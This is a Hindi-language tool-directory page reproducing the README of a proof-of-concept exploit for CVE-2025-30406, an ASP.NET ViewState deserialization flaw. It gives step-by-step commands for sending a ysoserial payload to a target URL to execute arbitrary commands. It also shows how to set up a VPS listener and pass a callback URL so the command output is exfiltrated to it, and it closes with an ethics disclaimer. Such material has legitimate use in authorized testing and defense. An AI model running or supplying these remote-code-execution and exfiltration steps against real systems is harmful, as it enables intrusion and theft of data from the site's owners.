Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
उपकरण/GitHubGitHub/mchklt/cve-2025-30406
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

रिपॉजिटरी देखें
901841 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30406 ViewState शोषण PoC

अवलोकन

यह एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट है जो ASP.NET अनुप्रयोगों में CVE-2025-30406 के लिए ViewState डिसीरियलाइज़ेशन शोषण प्रदर्शित करती है। यह एक दुर्भावनापूर्ण ViewState पेलोड उत्पन्न करने के लिए ysoserial का उपयोग करती है और इसे प्रदान किए गए कमांड को निष्पादित करने के लिए उपयोगकर्ता-निर्दिष्ट URL पर भेजती है। सर्वोत्तम परिणामों के लिए, कमांड आउटपुट को VPS पर चल रहे एक कस्टम HTTP सर्वर (server.py) पर एक्सफ़िलट्रेट किया जा सकता है, जो परिणामों को टाइमस्टैम्प, हरे प्रॉम्प्ट और सफेद आउटपुट टेक्स्ट के साथ स्टाइलिश प्रारूप में प्रदर्शित करता है। यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग केवल उन सिस्टमों पर किया जाना चाहिए जहाँ आपके पास सुरक्षा परीक्षण करने की स्पष्ट अनुमति हो। अनधिकृत उपयोग अवैध और अनैतिक है।

CVE विवरण

  • CVE ID: CVE-2025-30406
  • विवरण: ASP.NET ViewState हैंडलिंग में एक डिसीरियलाइज़ेशन भेद्यता जो मान्य वैलिडेशन कुंजी और जनरेटर ज्ञात होने पर रिमोट कोड निष्पादन की अनुमति देती है।
  • प्रभावित सिस्टम: भेद्य ViewState कॉन्फ़िगरेशन वाले ASP.NET अनुप्रयोग।
  • शोषण के लिए पूर्वापेक्षाएँ:
    • एक मान्य ViewState वैलिडेशन कुंजी और जनरेटर तक पहुँच।
    • ViewState पैरामीटर स्वीकार करने वाला एक भेद्य एंडपॉइंट।

रिपॉजिटरी सामग्री

  • exploit.py: ViewState पेलोड उत्पन्न करने और भेजने के लिए मुख्य PoC स्क्रिप्ट।
  • server.py: एक्सफ़िलट्रेटेड कमांड आउटपुट को स्टाइलिश प्रारूप में प्राप्त करने और प्रदर्शित करने के लिए एक HTTP सर्वर।
टूल डाउनलोड करें
  • README.md: यह फ़ाइल, सेटअप और उपयोग निर्देशों के साथ।
  • पूर्वापेक्षाएँ

    • Python 3.x
    • requests लाइब्रेरी (pip install requests)
    • ysoserial एक्ज़ीक्यूटेबल (Windows या आपके प्लेटफ़ॉर्म के लिए समतुल्य)
    • एक भेद्य ASP.NET अनुप्रयोग एंडपॉइंट
    • server.py चलाने के लिए एक VPS या सर्वर (एक्सफ़िलट्रेशन के लिए अनुशंसित)
    • लक्ष्य सिस्टम का परीक्षण करने की अनुमति

    इंस्टॉलेशन

    1. इस रिपॉजिटरी को क्लोन करें:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. आवश्यक Python पैकेज इंस्टॉल करें:
      root@kitploit:~
      pip install requests
      
    3. ysoserial डाउनलोड करें और इसे exploit.py के समान निर्देशिका में रखें या इसका पथ निर्दिष्ट करें:
      • ysoserial GitHub

    VPS पर सेटअप (अनुशंसित)

    एक्सफ़िलट्रेटेड कमांड आउटपुट को स्टाइलिश प्रारूप में प्राप्त करने के लिए, VPS पर server.py चलाएँ:

    1. server.py को अपने VPS पर कॉपी करें (जैसे, scp के माध्यम से):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. सुनिश्चित करें कि Python 3 इंस्टॉल है:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. सर्वर चलाएँ (डिफ़ॉल्ट पोर्ट 8000):
      root@kitploit:~
      python3 server.py
      
    4. सुनिश्चित करें कि VPS फ़ायरवॉल पोर्ट 8000 पर इनकमिंग ट्रैफ़िक की अनुमति देता है:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. VPS का सार्वजनिक IP या डोमेन नोट करें (जैसे, http://your-vps-ip:8000) exploit.py में -e फ़्लैग के साथ उपयोग के लिए।

    उपयोग

    शोषण चलाना

    exploit.py को आवश्यक तर्कों के साथ चलाएँ। -e फ़्लैग वैकल्पिक है लेकिन स्टाइलिश प्रदर्शन के लिए कमांड आउटपुट को server.py पर एक्सफ़िलट्रेट करने हेतु अत्यधिक अनुशंसित है।

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    तर्क

    • -u, --url: लक्ष्य URL (जैसे, http://target.com/page.aspx) [आवश्यक]
    • -c, --command: निष्पादित करने के लिए कमांड (जैसे, whoami) [आवश्यक]
    • -y, --ysoserial: ysoserial एक्ज़ीक्यूटेबल का पथ (डिफ़ॉल्ट: ./ysoserial.exe) [वैकल्पिक]
    • -e, --exfil: कमांड आउटपुट एक्सफ़िलट्रेट करने के लिए कॉलबैक URL (जैसे, http://your-vps:8000) [वैकल्पिक]

    उदाहरण

    1. एक्सफ़िलट्रेशन के बिना चलाएँ (ब्लाइंड निष्पादन):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. server.py चला रहे VPS पर एक्सफ़िलट्रेशन के साथ चलाएँ (अनुशंसित):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
      

    सर्वर चलाना

    अपने VPS या स्थानीय मशीन पर, एक्सफ़िलट्रेटेड आउटपुट प्राप्त करने के लिए HTTP सर्वर प्रारंभ करें:

    root@kitploit:~
    python3 server.py
    

    सर्वर कमांड आउटपुट को टाइमस्टैम्प, हरे $ प्रॉम्प्ट और पठनीयता के लिए सफेद टेक्स्ट के साथ प्रदर्शित करेगा।

    यह कैसे काम करता है

    1. शोषण स्क्रिप्ट (exploit.py):
      • ViewState पेलोड बनाने के लिए हार्डकोडेड वैलिडेशन कुंजी और जनरेटर के साथ ysoserial का उपयोग करती है।
      • यदि -e प्रदान किया गया है, तो कमांड को आउटपुट कैप्चर करने और उसे Invoke-WebRequest के माध्यम से कॉलबैक URL पर भेजने के लिए लपेटा जाता है।
      • पेलोड को POST अनुरोध में, __VIEWSTATE पैरामीटर में एम्बेड करके लक्ष्य URL पर भेजता है।
      • सर्वर की प्रतिक्रिया स्थिति और प्रतिक्रिया बॉडी का एक भाग प्रिंट करता है।
    2. HTTP सर्वर (server.py):
      • कमांड आउटपुट वाले GET अनुरोधों को सुनता है।
      • URL पथ को डिकोड करता है और उसे पंक्तियों में विभाजित करता है।
      • प्रत्येक पंक्ति को टाइमस्टैम्प, हरे $ प्रॉम्प्ट और सफेद आउटपुट टेक्स्ट के साथ प्रिंट करता है।
      • HTTP 200 और "OK" के साथ प्रतिक्रिया देता है।

    नैतिक उपयोग चेतावनी

    • यह स्क्रिप्ट CVE-2025-30406 के लिए शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों हेतु एक प्रूफ-ऑफ-कॉन्सेप्ट है।
    • इस स्क्रिप्ट का उपयोग सिस्टम स्वामी की स्पष्ट अनुमति के बिना किसी भी सिस्टम पर न करें।
    • दुरुपयोग कानूनों का उल्लंघन कर सकता है, जिसमें संयुक्त राज्य अमेरिका का कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) या अन्यत्र समान कानून शामिल हैं।
    • किसी भी सिस्टम का परीक्षण करने से पहले हमेशा लिखित सहमति प्राप्त करें।
    • समन्वित प्रकटीकरण या बग बाउंटी कार्यक्रमों के माध्यम से भेद्यताओं की जिम्मेदारीपूर्वक रिपोर्ट करें।

    सीमाएँ

    • हार्डकोडेड वैलिडेशन कुंजी और जनरेटर केवल विशिष्ट भेद्य अनुप्रयोगों के लिए काम कर सकते हैं। उपयोगकर्ताओं को अनुप्रयोग-विशिष्ट मानों की आवश्यकता हो सकती है।
    • शोषण ViewState डिसीरियलाइज़ेशन के प्रति भेद्य ASP.NET अनुप्रयोगों को लक्षित करता है।
    • स्क्रिप्ट मानती है कि लक्ष्य सर्वर ViewState पेलोड को सही ढंग से संसाधित करता है।
    • क्रॉस-प्लेटफ़ॉर्म संगतता ysoserial की उपलब्धता पर निर्भर करती है (मुख्य रूप से Windows-आधारित)।
    • एक्सफ़िलट्रेशन के लिए -e कॉलबैक URL हेतु सार्वजनिक रूप से सुलभ सर्वर की आवश्यकता होती है।

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।

    संपर्क

    प्रश्नों या फ़ीडबैक के लिए, कृपया इस रिपॉजिटरी पर एक issue खोलें।